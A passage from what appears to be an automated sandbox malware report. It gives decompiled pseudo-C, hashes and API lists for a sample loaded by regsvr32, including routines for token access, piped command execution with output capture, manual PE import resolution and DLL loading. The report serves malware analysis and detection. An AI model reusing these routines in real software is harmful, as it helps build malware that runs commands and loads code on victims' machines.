                  • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                  • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                  • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                  • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                  • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                  • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                  • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                  • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                  • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E100121FF(char* __eax, char** _a4, long long* _a8) {
                  				char* _v8;
                  				long long _v16;
                  				char* _t9;
                  				signed char _t11;
                  				char** _t19;
                  				char _t22;
                  				long long _t32;
                  				long long _t33;
                  
                  				_t9 = __eax;
                  				L100122CD();
                  				_t19 = _a4;
                  				_t22 =  *__eax;
                  				if( *_t22 != 0x2e) {
                  					_t9 = strchr( *_t19, 0x2e);
                  					if(_t9 != 0) {
                  						 *_t9 =  *_t22;
                  					}
                  				}
                  				L10012291();
                  				 *_t9 =  *_t9 & 0x00000000;
                  				_t11 = strtod( *_t19,  &_v8);
                  				asm("fst qword [ebp-0xc]");
                  				_t32 =  *0x10018250;
                  				asm("fucomp st1");
                  				asm("fnstsw ax");
                  				if((_t11 & 0x00000044) != 0) {
                  					L5:
                  					st0 = _t32;
                  					L10012291();
                  					if( *_t11 != 0x22) {
                  						_t33 = _v16;
                  						goto L8;
                  					} else {
                  						return _t11 | 0xffffffff;
                  					}
                  				} else {
                  					_t33 =  *0x10018258;
                  					asm("fucomp st1");
                  					asm("fnstsw ax");
                  					if((_t11 & 0x00000044) != 0) {
                  						L8:
                  						 *_a8 = _t33;
                  						return 0;
                  					} else {
                  						goto L5;
                  					}
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                  • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                  • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                  • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E1000CF84(void* __ecx) {
                  				intOrPtr _t11;
                  				long _t12;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				struct _OSVERSIONINFOA* _t29;
                  
                  				_push(__ecx);
                  				_t29 =  *0x1001e688; // 0x2bb0590
                  				GetCurrentProcess();
                  				_t11 = E1000BA05();
                  				_t1 = _t29 + 0x1644; // 0x2bb1bd4
                  				_t25 = _t1;
                  				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                  				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                  				_t33 = _t12;
                  				if(_t12 != 0) {
                  					_t12 = E10008FBE(_t25, _t33);
                  				}
                  				_t3 = _t29 + 0x228; // 0x2bb07b8
                  				 *(_t29 + 0x1854) = _t12;
                  				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                  				memset(_t29, 0, 0x9c);
                  				_t29->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t29);
                  				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                  				_t17 = E1000E3B6(_t3);
                  				_t7 = _t29 + 0x220; // 0x2bb07b0
                  				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                  				_t18 = E1000E3F1(_t7);
                  				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                  				return _t18;
                  			}

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,02BB0590,?,10003545), ref: 1000CF90
                  • GetModuleFileNameW.KERNEL32(00000000,02BB1BD4,00000105,?,?,02BB0590,?,10003545), ref: 1000CFB1
                  • memset.MSVCRT ref: 1000CFE2
                  • GetVersionExA.KERNEL32(02BB0590,02BB0590,?,10003545), ref: 1000CFED
                  • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                  • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                  • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                  • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000B946(void* __ecx) {
                  				void* _v8;
                  				void* _t9;
                  
                  				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                  					_t9 = _v8;
                  				} else {
                  					_t9 = 0;
                  				}
                  				return _t9;
                  			}

                  APIs
                  • GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                  • OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
                  • GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                  • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                  • OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken$ErrorLast
                  • String ID:
                  • API String ID: 102224034-0
                  • Opcode ID: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                  • Instruction ID: 5b563ac24429287b405df7abe271a8f453b302f4379ab1304781a3c6047c2fee
                  • Opcode Fuzzy Hash: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                  • Instruction Fuzzy Hash: 20F05E7150061AABFB41DFA48C49F5E73ACFB04280F018418F702D3054E670EF048761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E1000A9B7(signed int __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				signed int _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				struct _SECURITY_ATTRIBUTES _v48;
                  				intOrPtr _v60;
                  				char _v64;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* _v84;
                  				short _v92;
                  				intOrPtr _v96;
                  				void _v140;
                  				intOrPtr _t77;
                  				void* _t79;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				intOrPtr _t92;
                  				intOrPtr _t98;
                  				intOrPtr _t100;
                  				intOrPtr _t102;
                  				long _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t126;
                  				void* _t127;
                  				void* _t128;
                  				void* _t129;
                  				void* _t130;
                  
                  				_t111 = 0;
                  				_v24 = __ecx;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_t127 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				_v48.nLength = 0xc;
                  				_v48.lpSecurityDescriptor = 0;
                  				_v48.bInheritHandle = 1;
                  				_v28 = 0;
                  				memset( &_v140, 0, 0x44);
                  				asm("stosd");
                  				_t130 = _t129 + 0xc;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                  					L18:
                  					return 0;
                  				}
                  				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                  					L13:
                  					E1000861A( &_v28, 0);
                  					if(_v20 != 0) {
                  						_t77 =  *0x1001e684; // 0x2c2faa0
                  						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                  					}
                  					if(_v8 != 0) {
                  						_t115 =  *0x1001e684; // 0x2c2faa0
                  						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                  					}
                  					return _t111;
                  				}
                  				_t79 = _v16;
                  				_v76 = _t79;
                  				_v80 = _t79;
                  				_v84 = _v12;
                  				_v140 = 0x44;
                  				_v96 = 0x101;
                  				_v92 = 0;
                  				_t126 = E10008604(0x1001);
                  				_v28 = _t126;
                  				if(_t126 == 0) {
                  					goto L18;
                  				}
                  				_push( &_v64);
                  				_push( &_v140);
                  				_t85 =  *0x1001e684; // 0x2c2faa0
                  				_push(0);
                  				_push(0);
                  				_push(0x8000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push(_v24);
                  				_push(0);
                  				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                  					goto L13;
                  				}
                  				_t87 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                  				_t89 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                  				_v24 = _v24 & 0;
                  				do {
                  					_t92 =  *0x1001e684; // 0x2c2faa0
                  					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                  					 *((char*)(_v24 + _t126)) = 0;
                  					if(_t111 == 0) {
                  						_t127 = E100091A6(_t126, 0);
                  					} else {
                  						_push(0);
                  						_push(_t126);
                  						_v32 = _t127;
                  						_t127 = E10009292(_t127);
                  						E1000861A( &_v32, 0xffffffff);
                  						_t130 = _t130 + 0x14;
                  					}
                  					_t111 = _t127;
                  					_v32 = _t127;
                  				} while (_v36 != 0);
                  				_push( &_v36);
                  				_push(E1000C379(_t127));
                  				_t98 =  *0x1001e68c; // 0x2c2fc68
                  				_push(_t127);
                  				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                  					L12:
                  					_t100 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                  					_t102 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                  					goto L13;
                  				}
                  				_t128 = E10009256(_t127);
                  				if(_t128 == 0) {
                  					goto L12;
                  				}
                  				E1000861A( &_v32, 0);
                  				return _t128;
                  			}

                  APIs
                  • memset.MSVCRT ref: 1000A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                  • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocFreememset
                  • String ID: D
                  • API String ID: 488076629-2746444292
                  • Opcode ID: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
                  • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                  • Opcode Fuzzy Hash: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
                  • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E1001249B(signed int __eax, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				signed int* _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				struct HINSTANCE__* _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				signed int _v64;
                  				signed int _t109;
                  				signed int _t112;
                  				signed int _t115;
                  				void* _t163;
                  
                  				_v44 = _v44 & 0x00000000;
                  				if(_a4 != 0) {
                  					_v48 = GetModuleHandleA("kernel32.dll");
                  					_v40 = E1000E099(_v48, "GetProcAddress");
                  					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  					_v32 = _v52;
                  					_t109 = 8;
                  					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                  						L24:
                  						return 0;
                  					}
                  					_v56 = 0x80000000;
                  					_t112 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_v8 = _v8 + 0x14;
                  					}
                  					_t115 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_t34 = _v8 + 0xc; // 0xffff
                  						_v36 = LoadLibraryA( *_t34 + _a4);
                  						if(_v36 != 0) {
                  							if( *_v8 == 0) {
                  								_t43 = _v8 + 0x10; // 0xb8
                  								_v12 =  *_t43 + _a4;
                  							} else {
                  								_v12 =  *_v8 + _a4;
                  							}
                  							_v28 = _v28 & 0x00000000;
                  							while( *_v12 != 0) {
                  								_v24 = _v24 & 0x00000000;
                  								_v16 = _v16 & 0x00000000;
                  								_v64 = _v64 & 0x00000000;
                  								_v20 = _v20 & 0x00000000;
                  								if(( *_v12 & _v56) == 0) {
                  									_v60 =  *_v12 + _a4;
                  									_v20 = _v60 + 2;
                  									_t73 = _v8 + 0x10; // 0xb8
                  									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                  									_v16 = _v40(_v36, _v20);
                  								} else {
                  									_v24 =  *_v12;
                  									_v20 = _v24 & 0x0000ffff;
                  									_v16 = _v40(_v36, _v20);
                  								}
                  								if(_v24 != _v16) {
                  									_v44 = _v44 + 1;
                  									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                  										 *_v12 = _v16;
                  									} else {
                  										_t89 = _v8 + 0x10; // 0xb8
                  										 *( *_t89 + _a4 + _v28) = _v16;
                  									}
                  								}
                  								_v12 =  &(_v12[1]);
                  								_v28 = _v28 + 4;
                  							}
                  							_v8 = _v8 + 0x14;
                  							continue;
                  						}
                  						_t163 = 0xfffffffd;
                  						return _t163;
                  					}
                  					goto L24;
                  				}
                  				return __eax | 0xffffffff;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                  • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                  • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                  • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				void _v140;
                  				signed char _t14;
                  				char _t15;
                  				intOrPtr _t20;
                  				void* _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t32;
                  				WCHAR* _t34;
                  				intOrPtr _t35;
                  				struct HINSTANCE__* _t37;
                  				int _t38;
                  				intOrPtr _t46;
                  				void* _t47;
                  				intOrPtr _t50;
                  				void* _t60;
                  				void* _t61;
                  				char _t62;
                  				char* _t63;
                  				void* _t65;
                  				intOrPtr _t66;
                  				char _t68;
                  
                  				_t65 = __esi;
                  				_t61 = __edi;
                  				_t47 = __ebx;
                  				_t50 =  *0x1001e688; // 0x2bb0590
                  				_t1 = _t50 + 0x1898; // 0x0
                  				_t14 =  *_t1;
                  				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                  					_t15 = E100095E1(_t50, 0xb62);
                  					_t66 =  *0x1001e688; // 0x2bb0590
                  					_t62 = _t15;
                  					_t67 = _t66 + 0xb0;
                  					_v8 = _t62;
                  					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                  					_t20 =  *0x1001e688; // 0x2bb0590
                  					_t7 = _t20 + 0xa8; // 0x1
                  					asm("sbb eax, eax");
                  					_t25 = E100095E1(_t67, ( ~( *_t7) & 0x00000068) + 0x615);
                  					_t63 = "\\";
                  					_t26 =  *0x1001e688; // 0x2bb0590
                  					_t68 = E100092E5(_t26 + 0x1020);
                  					_v12 = _t68;
                  					E100085D5( &_v8);
                  					_t32 =  *0x1001e688; // 0x2bb0590
                  					_t34 = E100092E5(_t32 + 0x122a);
                  					 *0x1001e784 = _t34;
                  					_t35 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                  					_t37 = LoadLibraryW( *0x1001e784);
                  					 *0x1001e77c = _t37;
                  					if(_t37 == 0) {
                  						_t38 = 0;
                  					} else {
                  						_push(_t37);
                  						_t60 = 0x28;
                  						_t38 = E1000E171(0x1001bb48, _t60);
                  					}
                  					 *0x1001e780 = _t38;
                  					E1000861A( &_v12, 0xfffffffe);
                  					memset( &_v140, 0, 0x80);
                  					if( *0x1001e780 != 0) {
                  						goto L10;
                  					} else {
                  						E1000861A(0x1001e784, 0xfffffffe);
                  						goto L8;
                  					}
                  				} else {
                  					L8:
                  					if( *0x1001e780 == 0) {
                  						_t46 =  *0x1001e6bc; // 0x2c2fbc8
                  						 *0x1001e780 = _t46;
                  					}
                  					L10:
                  					return 1;
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                  • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                  • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                  • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E10012D70(int _a4, signed int _a8) {
                  				int _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void* __esi;
                  				void* _t137;
                  				signed int _t141;
                  				intOrPtr* _t142;
                  				signed int _t145;
                  				signed int _t146;
                  				intOrPtr _t151;
                  				intOrPtr _t161;
                  				intOrPtr _t162;
                  				intOrPtr _t167;
                  				intOrPtr _t170;
                  				signed int _t172;
                  				intOrPtr _t173;
                  				int _t184;
                  				intOrPtr _t185;
                  				intOrPtr _t188;
                  				signed int _t189;
                  				void* _t195;
                  				int _t202;
                  				int _t208;
                  				intOrPtr _t217;
                  				signed int _t218;
                  				int _t219;
                  				intOrPtr _t220;
                  				signed int _t221;
                  				signed int _t222;
                  				int _t224;
                  				int _t225;
                  				signed int _t227;
                  				intOrPtr _t228;
                  				int _t232;
                  				int _t234;
                  				signed int _t235;
                  				int _t239;
                  				void* _t240;
                  				int _t245;
                  				int _t252;
                  				signed int _t253;
                  				int _t254;
                  				void* _t257;
                  				void* _t258;
                  				int _t259;
                  				intOrPtr _t260;
                  				int _t261;
                  				signed int _t269;
                  				signed int _t271;
                  				intOrPtr* _t272;
                  				void* _t273;
                  
                  				_t253 = _a8;
                  				_t272 = _a4;
                  				_t3 = _t272 + 0xc; // 0x452bf84d
                  				_t4 = _t272 + 0x2c; // 0x8df075ff
                  				_t228 =  *_t4;
                  				_t137 =  *_t3 + 0xfffffffb;
                  				_t229 =  <=  ? _t137 : _t228;
                  				_v16 =  <=  ? _t137 : _t228;
                  				_t269 = 0;
                  				_a4 =  *((intOrPtr*)( *_t272 + 4));
                  				asm("o16 nop [eax+eax]");
                  				while(1) {
                  					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                  					_t141 =  *_t8 + 0x2a >> 3;
                  					_v12 = 0xffff;
                  					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                  					if(_t217 < _t141) {
                  						break;
                  					}
                  					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t12 = _t272 + 0x5c; // 0x84e85000
                  					_t245 =  *_t11 -  *_t12;
                  					_v8 = _t245;
                  					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                  					_t247 =  <  ? _t195 : _v12;
                  					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                  					if(_t227 >= _v16) {
                  						L7:
                  						if(_t253 != 4) {
                  							L10:
                  							_t269 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t285 = _t227 - _t195;
                  							if(_t227 != _t195) {
                  								goto L10;
                  							} else {
                  								_t269 = _t253 - 3;
                  							}
                  						}
                  						E10015D90(_t272, _t272, 0, 0, _t269);
                  						_t18 = _t272 + 0x14; // 0xc703f045
                  						_t19 = _t272 + 8; // 0x8d000040
                  						 *( *_t18 +  *_t19 - 4) = _t227;
                  						_t22 = _t272 + 0x14; // 0xc703f045
                  						_t23 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                  						_t26 = _t272 + 0x14; // 0xc703f045
                  						_t27 = _t272 + 8; // 0x8d000040
                  						 *( *_t26 +  *_t27 - 2) =  !_t227;
                  						_t30 = _t272 + 0x14; // 0xc703f045
                  						_t31 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                  						E10014AF0(_t285,  *_t272);
                  						_t202 = _v8;
                  						_t273 = _t273 + 0x14;
                  						if(_t202 != 0) {
                  							_t208 =  >  ? _t227 : _t202;
                  							_v8 = _t208;
                  							_t36 = _t272 + 0x38; // 0xf47d8bff
                  							_t37 = _t272 + 0x5c; // 0x84e85000
                  							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                  							_t273 = _t273 + 0xc;
                  							_t252 = _v8;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                  							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                  							_t227 = _t227 - _t252;
                  						}
                  						if(_t227 != 0) {
                  							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                  							_t273 = _t273 + 0xc;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                  						}
                  						_t253 = _a8;
                  						if(_t269 == 0) {
                  							continue;
                  						}
                  					} else {
                  						if(_t227 != 0 || _t253 == 4) {
                  							if(_t253 != 0 && _t227 == _t195) {
                  								goto L7;
                  							}
                  						}
                  					}
                  					break;
                  				}
                  				_t142 =  *_t272;
                  				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                  				_a4 = _t232;
                  				if(_t232 == 0) {
                  					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t254 =  *_t83;
                  				} else {
                  					_t59 = _t272 + 0x2c; // 0x8df075ff
                  					_t224 =  *_t59;
                  					if(_t232 < _t224) {
                  						_t65 = _t272 + 0x3c; // 0x830cc483
